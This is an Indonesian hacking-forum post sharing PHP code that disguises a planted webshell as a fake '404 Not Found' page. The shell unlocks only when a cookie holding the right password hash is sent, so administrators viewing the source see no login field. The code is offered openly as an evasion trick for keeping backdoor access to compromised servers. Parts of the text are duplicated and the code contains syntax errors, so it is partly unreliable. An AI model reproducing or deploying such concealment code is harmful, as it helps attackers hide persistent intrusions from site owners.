09-20-2015, 08:48 PM
Numpang share ya bro :v Saya perhatikan kalau webshell berpassword yang umum, biasanya tampilannya 404 not found tapi kalau diraba2 gitu ada colom buat ngisi password :v Kalau seandainya adminnya liat viewource keliatan deh kolomnya :v
Tapi, disini authentikasinya saya robah lagi jadi pake cookie bro. Ini screenshootnya
Oke, dari hasil diatas kalau di view source gak ada column tuh :v Untuk masukin passwordnya kita perlu add on yang namanya cookies manager
Setelah itu save baru muncul webshellnya :v
Dan ini kode PHP nya, ditaruh dicode shell yang atas aja bro
Mungkin buat agan2 yang udah bisa pemrograman PHP ini mungkin sudah biasa, tapi gak ada salahnya kalau ane share :v Jangan lupa cendol ya bro :v
Tapi, disini authentikasinya saya robah lagi jadi pake cookie bro. Ini screenshootnya
Oke, dari hasil diatas kalau di view source gak ada column tuh :v Untuk masukin passwordnya kita perlu add on yang namanya cookies manager
Setelah itu save baru muncul webshellnya :v
Dan ini kode PHP nya, ditaruh dicode shell yang atas aja bro
PHP Code:
$s_show = ""; md5(password)
if(!isset($_COOKIE['show'])) {
setcookie("show","null",time() 3600);
}
if(kript($_COOKIE['show']) == $s_show) {
setcookie("show",md5($_SERVER['HTTP_USER_AGENT'].md5($_COOKIE['show']).$_SERVER['SCRIPT_NAME']),time() + 3600);
} else {
if($_COOKIE['show'] != md5($_SERVER['HTTP_USER_AGENT'].$s_show.$_SERVER['SCRIPT_NAME'])) {
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php echo $_SERVER['SCRIPT_NAME'];?> was not found on this server.</p> <hr> <address><?php echo $_SERVER['SERVER_SOFTWARE'];?> Server at <?php echo $_SERVER['HTTP_HOST']; ?> Port <?php echo $_SERVER['SERVER_PORT'];?></address> </body></html>
<?php
exit;
}}
Mungkin buat agan2 yang udah bisa pemrograman PHP ini mungkin sudah biasa, tapi gak ada salahnya kalau ane share :v Jangan lupa cendol ya bro :v
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)